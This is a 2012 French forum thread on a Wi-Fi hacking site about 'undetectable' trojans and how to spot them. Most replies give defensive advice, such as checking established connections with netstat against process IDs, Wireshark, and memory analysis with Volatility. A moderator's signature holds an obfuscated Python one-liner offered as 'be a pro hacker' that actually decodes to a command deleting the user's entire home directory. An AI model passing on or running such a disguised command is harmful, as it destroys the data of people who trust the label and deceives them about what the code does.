Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-02-2012 12:36:29

Willywpl
Membre Actif
Inscription : 03-02-2012
Messages : 31

Trojan indetectable/trojan

Bonjour ! J ai entendu parlé de trojan indetectable? Mais s'ils sont indetectable, comment les gens font pour savoir s'ils en ont un?
Est-il detectable lorsqu'il est en activité?
Le trojan est-il contrôlé par l émetteur de celui-ci?
Est-il possible de supprimer un trojan sans formater son PC?

Willy

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-02-2012 06:27:55

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Trojan indetectable/trojan

Salut !

Tu connais le virus Willy pollo tongue


J ai entendu parlé de trojan indetectable?

Oui, Il y a aucun antivirus efficace à 100 %. Un exemple par mis d'autres est le virus polymorphe qui peut changer sa signature. Cette dernière est un ou plusieurs bouts de code dans le programme du virus permettant à un antivirus de les détecter, mais pour être efficace il faudrait que la base virale de cet antivirus soit à jour.
D'autres peuvent attaquer l'antivirus en bloquant son exécution voir aussi la mise à jour.

Mais s'ils sont indetectable, comment les gens font pour savoir s'ils en ont un?
Est-il detectable lorsqu'il est en activité?

Consultation des logs de la machine, analyse des processus actifs en mémoire, reverse engineering, surveillance et analyse des connexions ( mais un trojan peut par exemple infecter un processus afin de s’immiscer dans son trafic réseau pour échapper à "Netstat" par exemple mais surtout à des règles de pare-feu qui filtre les connexion, ce qui nécessite d'analyser les paquets). Tu remarques que ce n'est pas à la porter du simple utilisateur qui googlise ou qui facekise big_smile
D'une autre manière, il faudrait voir tous les fichiers qui ont été ajoutés ou modifier sur le disque dur depuis une date jugée "saine", ça implique d'avoir une vision globale des fichiers, c'est impossible surtout sur Windows. Mais certains antivirus ont cette faculté, ils gardent en mémoire le dernier scan et lors de la prochaine analyse ils scannent uniquement les fichiers ayant été modifiés ou ajouter, donc une analyse rapide et une utilisation réduite des ressources de l'ordinateur.

Est-il possible de supprimer un trojan sans formater son PC?

Oui c'est possible, encore faut-il le trouver.

Hors Ligne

#3 17-02-2012 08:03:27

Willywpl
Membre Actif
Inscription : 03-02-2012
Messages : 31

Re : Trojan indetectable/trojan

Salut Fuji, merci de ta réponse. Mais je ne vois pas trop ce que sont les "logs" et comment les trouver ...
Et en ce qui concerne la suppression de virus, tu contredis mon prof de techno de 5eme qui m avait dit qu'il était impossible de supprimer un virus de son PC à part en le formatant. C est pourquoi il faut faire très attention etc.
Mais c est vrai que je me suis dit la chose suivante: Lorsqu'on est malade (grippe) on se soigne, et ensuite cette maladie disparait. Et les ordinateurs c est pareil ! Les trojans sont certainnement une bonne gripe qu'il faut soigner et supprimer non? Haha
Mais comment ? J aimerai soigner mon pauvre ordinateur qui commence à vieillir énormément et qui risque de nous quitter.

Dernière modification par Willywpl (17-02-2012 08:04:52)

Hors Ligne

#4 17-02-2012 18:28:26

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Trojan indetectable/trojan

Willywpl a écrit :

Et en ce qui concerne la suppression de virus, tu contredis mon prof de techno de 5eme qui m avait dit qu'il était impossible de supprimer un virus de son PC à part en le formatant.

Tes profs ne détiennent pas la vérité absolue et ne savent pas tout sur tout. En l'occurence, celui qui a dit ça aurait mieux fait de se taire, c'est une perle celle là! lol

Hors Ligne

#5 17-02-2012 18:52:48

Willywpl
Membre Actif
Inscription : 03-02-2012
Messages : 31

Re : Trojan indetectable/trojan

Un prof de techno n'est pas spécialisé en informatique smile !
Et comment supprimer un trojan par exemple?

Hors Ligne

#6 18-02-2012 23:42:37

n0ct1s
Membre
Inscription : 12-02-2012
Messages : 12

Re : Trojan indetectable/trojan

comment les gens font pour savoir s'ils en ont un?

tout dabord ferme tout  programme ayant un accé a internet ( navigateur, ùtorrent ect..)
ensuite tu fais > demarrer > executer > cmd

dans le shell tu tapes:

>netstat -b

Cela te donne la liste des connections etablie sur le pc avec les adresses ip distante. 
Dans les connections qui comporte l'etat "etablished" regarde le PID, la colonne juste a droite de la colonne "ETAT" (ce sont des numeros du genre 3804).

tu ouvres le gestionnaire de tache Ctrl+Alt+Suppr ensuite affichage > selectionner les colonnes > PID

ensuite tu compares les PID qu'il y a dans ton shell a ceux du gestionnaire de tache afin de voir quel prog
a etablie la connection.

Ceci permet de savoir les connections etablie ainsi que le prog associé a celle-ci.
Tu peux également verifier les ip sur google et voir si elles proviennent ou pas de ton AV, si oui tant mieu sinon...

Faire un trojan polymorph n'est pas a la porté de tout le monde, donc déjà avec ca tu devrais pouvoir "capter" un troj lambda.

Dernière modification par n0ct1s (19-02-2012 00:39:57)

Hors Ligne

#7 19-02-2012 16:18:30

Willywpl
Membre Actif
Inscription : 03-02-2012
Messages : 31

Re : Trojan indetectable/trojan

Merci beaucoup! Ta réponse est très intéressante ! smile

Hors Ligne

#8 20-02-2012 20:22:41

n0ct1s
Membre
Inscription : 12-02-2012
Messages : 12

Re : Trojan indetectable/trojan

Derien mais ca fonctionnera pas forcement car certain trojan peuvent migrer dans dautre processus....
XD la video sur virus polymorph
C'est le genre de truc qui rend dingue !

Et en ce qui concerne la suppression de virus, tu contredis mon prof de techno de 5eme qui m avait dit qu'il était impossible de supprimer un virus de son PC à part en le formatant.

Moi perso si j'ai un doute je cherche même pas à comprendre je formate au moin c'est sûr !

Hors Ligne

#9 22-02-2012 17:41:33

Willywpl
Membre Actif
Inscription : 03-02-2012
Messages : 31

Re : Trojan indetectable/trojan

Ok merci n0ct1s smile

Hors Ligne

#10 24-03-2012 12:13:00

Boofku
Membre Actif
Inscription : 28-11-2009
Messages : 28

Re : Trojan indetectable/trojan

Il parait que formater ça sert à rien, mieux vaut changer de PC, pour chance j'en ai deux à vendre!

Hors Ligne

#11 24-03-2012 15:02:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Trojan indetectable/trojan

Il parait que formater ça sert à rien, mieux vaut changer de PC, pour chance j'en ai deux à vendre!

Tu dois etre aisé alors car si tu changes de pc a chaque petit trojan que tu choppes... t'en a eu combien? big_smile

Inutile de changer de pc ni de formater, faut d'abord trouver le process louche ou une ip distante inconnue au bataillon.netstat -n rempli bien cette fonction et si tu as vraiment un doute tu prends wireshark en complément.

Hors Ligne

#12 26-03-2012 12:52:49

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Trojan indetectable/trojan

j'ajoute un lien qui vous permettra de scanner un .exe en profondeur !
anubis scanner


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#13 26-03-2012 17:59:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Trojan indetectable/trojan

De toute façon, un bon virus trompe tskmgr.exe et ses amis. (et je ne parle pas des rootkit)

Dans l'absolu tu ne peux pas savoir si tu es infecté.

Tu peux détecter un virus en activité en lisant ta RAM (ex avec volatility)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
5 4504 16-03-2015 15:04:11 par romeoandjuliet
1 544 28-02-2015 23:55:20 par spawn
8 1741 16-03-2014 00:38:47 par kcdtv
4 1512 06-03-2014 01:39:37 par Fuji
12 5524 15-12-2013 16:21:24 par coyotus

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]